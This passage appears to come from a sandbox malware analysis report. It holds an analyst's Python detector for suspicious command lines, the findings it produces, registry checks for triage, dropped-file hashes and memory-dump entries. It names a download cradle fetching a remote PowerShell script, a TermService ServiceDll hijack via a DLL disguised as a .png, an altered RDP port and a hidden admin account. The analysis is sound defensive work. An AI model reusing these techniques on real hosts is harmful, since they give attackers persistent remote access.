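                    findings.append(("download_cradle", url.group(0) if url else None))
    elif exe == "reg.exe" and len(toks) > 2 and low[1] == "add":
        opts = {low[i]: toks[i + 1] for i in range(3, len(toks) - 1) if low[i].startswith("/")}
        key, value, data = toks[2], opts.get("/v", ""), opts.get("/d", "")
        if key.lower().endswith("\\winstations\\rdp-tcp") and value.lower() == "portnumber":
            # reg.exe accepts 0x1C21 as well as 7201; 3389 is the stock RDP listener port
            port = int(data, 16 if data.lower().startswith("0x") else 10) if re.fullmatch(r"0x[0-9a-f]+|\d+", data, re.I) else None
            if port is not None and port != 3389:
                findings.append(("rdp_port_changed", port))
        elif value.lower() == "servicedll":
            findings.append(("service_dll_set", (key.split("\\")[-2] if "\\" in key else key, data)))
            if not data.lower().endswith(".dll"):          # here a DLL dressed up as mediasrv.png
                findings.append(("service_dll_extension_mismatch", data))
        elif "\\policies\\microsoft\\windows nt\\terminal services" in key.lower():
            findings.append(("rdp_policy_changed", (value, data)))
    elif exe in ("net.exe", "net", "net1.exe", "net1") and len(toks) > 2:
        verb = low[1]
        if verb == "user":
            if "/add" in low:
                findings.append(("local_account_created", toks[2]))   # password sits in clear on the command line
            elif "/del" in low or "/delete" in low:
                findings.append(("local_account_deleted", toks[2]))
            elif len(toks) > 3 and not toks[3].startswith("/"):
                findings.append(("local_account_password_set", toks[2]))
        elif verb == "localgroup" and "/add" in low and len(toks) > 3:
            findings.append(("group_member_added", (toks[2], toks[3])))
        elif verb == "start":
            findings.append(("service_started", toks[2]))
    return findings

def analyze_tree(cmds):
    """Flatten findings over a list of command lines, e.g. a sandbox process tree."""
    return [finding for cmd in cmds for finding in analyze(cmd)]
```

Running analyze_tree(REPORT_COMMANDS) yields, among others, ("rdp_port_changed", 7201), ("service_dll_set", ("TermService", "C:\Windows\branding\mediasrv.png")), ("group_member_added", ("Administrators", "NT AUTHORITY\NETWORK SERVICE")), ("local_account_created", "WgaUtilAcc") and ("download_cradle", "https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"). On a live host the same three registry checks are reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDLL (stock value %SystemRoot%\System32\termsrv.dll), reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber (stock value 0xd3d = 3389) and reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services", and the account changes show up in net localgroup Administrators and net localgroup "Remote Desktop Users".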
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\RES6D27.tmp
  MD5: 265781461bd3699d32def7a26bf20ca6
  SHA1: fba089c250f1712a5474ef73e562e145d8bb70a1
  SHA256: eb78a1266e7a793b274a6cb70c2ad227fd5f680f5f5288698a57f980cb240085
  SHA512: 47907712aa99a3c6224b3c31d9054b8f374560a4e4d1c72cfce75448cb9d36c1eea61b4430dce2175b956299220954f31a183e9198fddb007b8393983eea5d8f
- C:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.dll
  MD5: a9981347d273073186b0845494e154a4
  SHA1: fc0cbb5b8532db34198eb41c4ff16bebbb85ba54
  SHA256: ba9056f883562b52279660e0936afa214ca6b40a6af0efd64eaee466b057479b
  SHA512: 83f7dbc80197edcf170d3c766c2eaaebba5be43f9818763493aa90efc02e68c3917b2c67eddb6f5d8ac90399e660a3e58d3b2bfe311d948bf72c98bff1b96a8b
- C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5: 3447df88de7128bdc34942334b2fab98
  SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
- C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
  MD5: 7cc73f9b87540e85212f709eafca7ea8
  SHA1: 3f43a1e1044dfb8d3354f055a5461d265719fa0e
  SHA256: 7147ad654973c344899b83fc6cf91fcc9ff39a83b5ef5d8521239fd2a37f8df5
  SHA512: c47acb6bed89647059b4a9ef052d4414d79697658c8f7d851ff84f3c64f2e7ce9631525db439a1279a8622d2ed74d838cef48fd235701d98d5da6a8c0f83dea3
- \??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\CSC4856BA9160684051B4EC1A7082BC632F.TMP
  MD5: b0b89925dbbeddc09c6af070ed3b73eb
  SHA1: 87fb0c632e90495b8e0beb1913db9228f8702e72
  SHA256: 1a095a8e9ed711a5570eae6eca259a0bcd64a42e75c3bd8bf9a3984c0fb89880
  SHA512: 2e31c1b2f4f98a51e500bad8eebfb0b001e908374eb9a9afbb8381df3d90d8d1966b5387ad210745fab841f24b8f744b8ebde308717efa59c8604820866e88b3
- \??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.0.cs
  MD5: 4864fc038c0b4d61f508d402317c6e9a
  SHA1: 72171db3eea76ecff3f7f173b0de0d277b0fede7
  SHA256: 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
  SHA512: 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
- \??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.cmdline
  MD5: cf56bdd57ce7b23167c75f86621d309a
  SHA1: 48a945bd148d833cc5f7b5c8d9e24cc625ebf5e8
  SHA256: 12d0f2ff7aaadc6fa960ed98cba20b02fb33cd0e790856cbe23cdff10899eab0
  SHA512: 571e6ab9fd7172eb5906cd227fcc4fbb79449c45c39e537699bb9e8d9127f1eb993ead99d067eeb6cc3060d655d6d411331dfb07d54f594a145759b4caa0c790
- \Windows\Branding\mediasrv.png
  MD5: 590ae32e6e9072e2b0ad71650d787af9
  SHA1: 0ab159b2b34b3ebcfdef8e9857fcd09605bbb0c7
  SHA256: 42d111d512d35fc3ae7a82399ee2cb9403836ddc676237c16a73cba14e7e72bc
  SHA512: 2b89db1d9229c9baa3cee7700609004cb0313d85886b7652500ba0c6ddee3aa80c39ea6e39ad84f3dba4527e202cf639068d26d93a004a25e90e69d14766179b
- \Windows\Branding\mediasvc.png
  MD5: c4184e993992dc9b9bb7d2b536311f98
  SHA1: fa3a97ac00dbdc7db025d40edf8013cc74d2244f
  SHA256: 81bd39baea5ba98b725f2362f09c41550bb768da73f174ef032e1a6b6318c6f6
  SHA512: d10f9f40da51ca5a71fa473d5521d103dfa55e681b72e789627b8406e3b7158a9621a6a233b1dab905823f4335c1aba27fd5d819f61179227b8ede17ba5f4c19
memory/188-234-0x0000000000000000-mapping.dmp
-
memory/1156-171-0x000001C3BBFE3000-0x000001C3BBFE5000-memory.dmp
Filesize 8KB
-
memory/1156-191-0x000001C3BBFE6000-0x000001C3BBFE8000-memory.dmp
Filesize 8KB
-
memory/1156-170-0x000001C3BBFE0000-0x000001C3BBFE2000-memory.dmp
Filesize 8KB
-
memory/1156-160-0x0000000000000000-mapping.dmp
-
memory/1240-237-0x0000000000000000-mapping.dmp
-
memory/1240-232-0x0000000000000000-mapping.dmp
-
memory/1252-240-0x0000015000530000-0x0000015000532000-memory.dmp
Filesize 8KB
-
memory/1252-243-0x0000015000538000-0x0000015000539000-memory.dmp
Filesize 4KB
-
memory/1252-239-0x0000000000000000-mapping.dmp
-
memory/1252-241-0x0000015000533000-0x0000015000535000-memory.dmp
Filesize 8KB
-
memory/1252-242-0x0000015000536000-0x0000015000538000-memory.dmp
Filesize 8KB
-
memory/1832-204-0x000001EAC88E6000-0x000001EAC88E8000-memory.dmp
Filesize 8KB
-
memory/1832-221-0x0000000000000000-mapping.dmp
-
memory/1832-200-0x0000000000000000-mapping.dmp
-
memory/1832-201-0x000001EAC88E0000-0x000001EAC88E2000-memory.dmp
Filesize 8KB
-
memory/1832-202-0x000001EAC88E3000-0x000001EAC88E5000-memory.dmp
Filesize 8KB
-
memory/1832-205-0x000001EAC88E8000-0x000001EAC88EA000-memory.dmp
Filesize 8KB
-
memory/1916-211-0x0000000000000000-mapping.dmp
-
memory/2064-236-0x0000000000000000-mapping.dmp
-
memory/2084-212-0x0000000000000000-mapping.dmp
-
memory/2088-217-0x0000000000000000-mapping.dmp
-
memory/2104-224-0x0000000000000000-mapping.dmp
-
memory/2104-231-0x0000000000000000-mapping.dmp
-
memory/2104-210-0x0000000000000000-mapping.dmp
-
memory/2144-227-0x0000000000000000-mapping.dmp
-
memory/2180-244-0x0000000000000000-mapping.dmp
-
memory/2284-140-0x0000000000000000-mapping.dmp
-
memory/2284-214-0x0000000000000000-mapping.dmp
-
memory/2352-218-0x0000000000000000-mapping.dmp
-
memory/2388-229-0x0000000000000000-mapping.dmp
-
memory/2528-245-0x0000000000000000-mapping.dmp
-
memory/2664-216-0x0000000000000000-mapping.dmp
-
memory/2664-235-0x0000000000000000-mapping.dmp
-
memory/2724-213-0x0000000000000000-mapping.dmp
-
memory/2804-230-0x0000000000000000-mapping.dmp
-
memory/2808-144-0x000001D4F7D70000-0x000001D4F7D71000-memory.dmp
Filesize 4KB
-
memory/2808-151-0x000001D4F8610000-0x000001D4F8611000-memory.dmp
Filesize 4KB
-
memory/2808-146-0x000001D4F7DC6000-0x000001D4F7DC8000-memory.dmp
Filesize 8KB
-
memory/2808-152-0x000001D4F89A0000-0x000001D4F89A1000-memory.dmp
Filesize 4KB
-
memory/2808-120-0x0000000000000000-mapping.dmp
-
memory/2808-126-0x000001D4F7D00000-0x000001D4F7D01000-memory.dmp
Filesize 4KB
-
memory/2808-129-0x000001D4F8130000-0x000001D4F8131000-memory.dmp
Filesize 4KB
-
memory/2808-130-0x000001D4F7DC0000-0x000001D4F7DC2000-memory.dmp
Filesize 8KB
-
memory/2808-153-0x000001D4F7DC8000-0x000001D4F7DC9000-memory.dmp
Filesize 4KB
-
memory/2808-131-0x000001D4F7DC3000-0x000001D4F7DC5000-memory.dmp
Filesize 8KB
-
memory/3024-208-0x0000027359FA6000-0x0000027359FA8000-memory.dmp
Filesize 8KB
-
memory/3024-206-0x0000027359FA0000-0x0000027359FA2000-memory.dmp
Filesize 8KB
-
memory/3024-203-0x0000000000000000-mapping.dmp
-
memory/3024-207-0x0000027359FA3000-0x0000027359FA5000-memory.dmp
Filesize 8KB
-
memory/3104-238-0x0000000000000000-mapping.dmp
-
memory/3796-215-0x0000000000000000-mapping.dmp
-
memory/3808-233-0x0000000000000000-mapping.dmp
-
memory/3872-226-0x0000000000000000-mapping.dmp
-
memory/3896-114-0x000001D77DB50000-0x000001D77DF71000-memory.dmp
Filesize 4.1MB
-
memory/3896-119-0x000001D77D716000-0x000001D77D717000-memory.dmp
Filesize 4KB
-
memory/3896-118-0x000001D77D715000-0x000001D77D716000-memory.dmp
Filesize 4KB
-
memory/3896-117-0x000001D77D713000-0x000001D77D715000-memory.dmp
Filesize 8KB
-
memory/3896-116-0x000001D77D710000-0x000001D77D712000-memory.dmp
Filesize 8KB
-
memory/3900-209-0x0000000000000000-mapping.dmp
-
memory/3908-228-0x0000000000000000-mapping.dmp
-
memory/3924-220-0x0000000000000000-mapping.dmp
-
memory/4040-225-0x0000000000000000-mapping.dmp
-
memory/4052-219-0x0000000000000000-mapping.dmp
-
memory/4068-137-0x0000000000000000-mapping.dmp